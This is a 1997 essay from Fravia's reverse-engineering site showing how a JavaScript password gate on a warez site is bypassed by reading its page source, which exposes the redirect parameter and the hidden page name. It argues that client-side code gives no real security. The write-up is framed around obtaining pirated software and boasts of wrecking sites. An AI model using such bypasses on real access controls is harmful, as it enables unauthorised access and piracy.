Webpages source fishing
Javascript "protections"
by jcr
(08 September 1997)
Courtesy of Fravia's page of reverse engineering
Well, this is a VERY interesting essay, in my opinion... see, if you have
a look at my antismut pages, you'll see that one of them
is dedicated to the gathering of tiny information snippets that are
frequently "forgotten"
inside the html source code of many pages. I have personally destroyed many
sites using those informations. You may need some other tools: a java decompiler
(in order to disassemble java compiled code, duh) and a "classviewer" (and a java virtual machine
of course) in order to practicize this kind of nice activity... in the mean time
you'll have your fun just examining the source code of all "suspect" pages, as
jcr teaches us with this very interesting example of a stupid web protection. Here is what he wrote to me:fravia: i came across this web protection that made me laugh, and
then cry. I's just dumb, dumb dumb dumb.
And the most saddening aspect is that the guy does have a brain,
because the code is interesting.
It's like shorting out a terribly complex copy protection scheme
with a silly simple jmp.
jcr (j, seer of the code)
Webpages source fishing
Javascript "protections"
by jcr, September 1997
A candidate for the stupidest (web-based) protection scheme:
I'm sorry if this is not appropriate material, but i just had to document
this blatant misuse of a brain (such a terrible thing to waste!).
This is not at all a crack, and has nothing to do with disassembly language,
but it is the st00pidest implementation of "security" on the web i have ever
seen.
While i was persuing after our beloved softice 3.2 (yes 3.2), walking the
warez road for all it's sin, (i'd buy the damn thing but i haven't
scrounged up a bleeding cent towards the 559$US or so needed, this hacking
gig isn't putting down the bills, you catch?) anyway, i came across this
silly little site at:
http://www.octonline.com/usr/fity07/main.htm
(which does NOT host THE debugger)
the story, as the author writes, is that you have to click on these ad
banners, muck around through all this bullshit commercialization, and find
a keyphrase (uh-oh) in order to enter the warez site.
I'm not into that, i don't like that, so i won't do that.
I hit the warez site, and sure enough am presented with a form asking me to
login.
Let's see first of all if there is anything in the markup that i can use to
my advantage: (please excuse: here is the mark in its entirety):
pwd.htm:
<HTML><HEAD>
<SCRIPT LANGUAGE="JavaScript">
<!-- Hide from JavaScript-Impaired Browsers
al="`1234567890-=~!@#$%^&*()_+qwer"
+"tyuiop[]QWERTYUIOP{}|asdfghjkl;A"
+"SDFGHJKL:zxcvbnm,./ZXCVBNM<>?";
ab1="";
bctr=0;
function ckPwd(){
tst=document.isn.username.value
+"*"+document.isn.passwrd.value+"*";
ls=document.pd.pe.value;
a=eval(ls.substring(0,2))-91;
ls=ls.substring(2,ls.length);
nls="";
flg=0;
while (ls.length>12){
ab=eval(ls.substring(0,2))-89;
ab1=(ab1==""?""+ab:ab1);
oab1=ab1;
ls=ls.substring(2,ls.length);
for (var i=0;i<ab;i++){
nr=eval(ls.substring(0,2))-a;
ls=ls.substring(2,ls.length);
nls+=al.charAt(nr);
}
nls+="*";
if (nls.indexOf(tst)>-1){
ls="";
flg=1;
}
}
if (flg==1){
tstOk();
}
else{
bctr++;
if (bctr>3){
/* Be sure to put the name of the page
here to which you want visitors are to be
sent after three tries if they FAIL to enter
a correct password and user name. */
location.href="error.htm";
}
else{
alert("Sorry. Bad Username or Password."
+" Failed Attempt #"+bctr+".");
}
}
}
function tstOk(){
ab1=ab1+""+a;
alert("OK. You Entered a Valid Username and Password, "
+document.isn.username.value+"! Taking you to the"
+" restricted page as soon as you click OK.");
location.href="pwdss.htm?"+ab1; <---- gee, thats sweet
}
function srand() {
today=new Date();
rand=today.getTime();
picker=""+rand
picker=picker.charAt((picker.length-4));
rec=eval(picker);
} // End Hiding --> </SCRIPT> </HEAD> <BODY BGCOLOR="white"><CENTER>
<FORM NAME="pd">
<!-- IMPORTANT: After you run the pseudo-encrypter, you will get a
"hidden" form element constructed especially for your own user names and
passwords. Paste that form element right below this note and above the end
of form tag. -->
<!-- Paste this element into your main script named pwd.htm in the
location indicated -->
<INPUT TYPE='hidden' NAME='pe'
VALUE='999881643741603841598498816759606041815967 '> </FORM>
<!-- You may put any page content you wish here The HTML below for the
password entry is presently set for blue background and white type. You
may change colors to fit your own page design without impacting on the
script, so long as the form elements stay the same. -->
<FORM NAME="isn">
<TABLE BORDER=2 CELLPADDING=5 CELLSPACING=0 BGCOLOR=BLUE>
<TR><TD COLSPAN=2 ALIGN=CENTER><FONT SIZE=4 COLOR=WHITE
FACE="helvetica,arial,geneva"><B>Password Access<BR>to Our Restricted
Pages</B></FONT></TD></TR>
<TR><TD><FONT SIZE=3 COLOR=WHITE><B>Your User Name:</B></FONT></TD>
<TD><INPUT TYPE="text" NAME="username" VALUE="" SIZE=10></TD></TR>
<TR><TD><FONT SIZE=3 COLOR=WHITE><B>Your Password:</B></FONT></TD>
<TD><INPUT TYPE="password" NAME="passwrd" VALUE="" SIZE=10></TD></TR>
<TR><TD COLSPAN=2 ALIGN=CENTER><INPUT TYPE="button" NAME="btn"
VALUE=" Submit " onClick="ckPwd();return false;"></TD></TR>
</TABLE></FORM>
<!-- Put any other content you wish on your page here -->
<SCRIPT LANGUAGE="JavaScript">
<!-- Hide JavaScript from Java-Impaired Browsers
/* This little script at the bottom of your
page isn't strictly necessary, but it does
put the visitor's cursor in the password form.
It's a small, but polite and thoughtful thing
to do for your visitors. */
document.isn.username.focus();
// End Hiding -->
</SCRIPT>
</BODY>
</HTML>
And here is the effect.
The whole thing reminds me so much of deprotecting and otherwise
reengineering, that i couldn't help but think of fravia and the stupid
protectionists page. (or is that just "stupid protections" page?) anyways,
right there, right in the middle of the markup i stare at a link to the
following scrap of markup:
pwdss.htm:
<!-- Create this intervening page named "pwdss.htm" to help keep the
restricted page URL a bit more difficult to discern. -->
<HTML><HEAD><SCRIPT LANGUAGE="JavaScript">
ck=location.search;
if (ck!="?98"){
/* Substitute your own WRONG
destination here. */
location.href="error.htm"; <-- Wanna this page
}
else{
/* Put the correct restricted
page name here. */
location.href="waret.htm"; <-- or rather this one?
}
</SCRIPT></HEAD></HTML>
</center>
The moral of this sad tale is: don't waste your time coercing your markup
language to implement security. IT WON'T DO, YOU CANNOT HIDE BEHIND
YOUR JAVASCRIPT, NOR YOUR JAVA CLASS, NOR YOUR ACTIVE-X. If the
protectionist's code must live on a host, it will never be secure.
Sad to say, this protection would be secure only to the most naive
web-idiot ("uhh, what's 'view source'... an option?")
Or: don't confuse obscurity and obsfucation with security.
j, seer of the code.
ps: or maybe i'm just the rare sort that happens to source the majority
of the web pages encountered... and for that matter... of the programs
encountered ;-)
(c) jcr, 1997. All rights reversed.
You are deep inside fravia's page of reverse
engineering, choose your way out:
homepage
links
anonymity
+ORC students' essays tools
cocktails
academy database
antismut search_forms mail_fravia
is reverse engineering legal?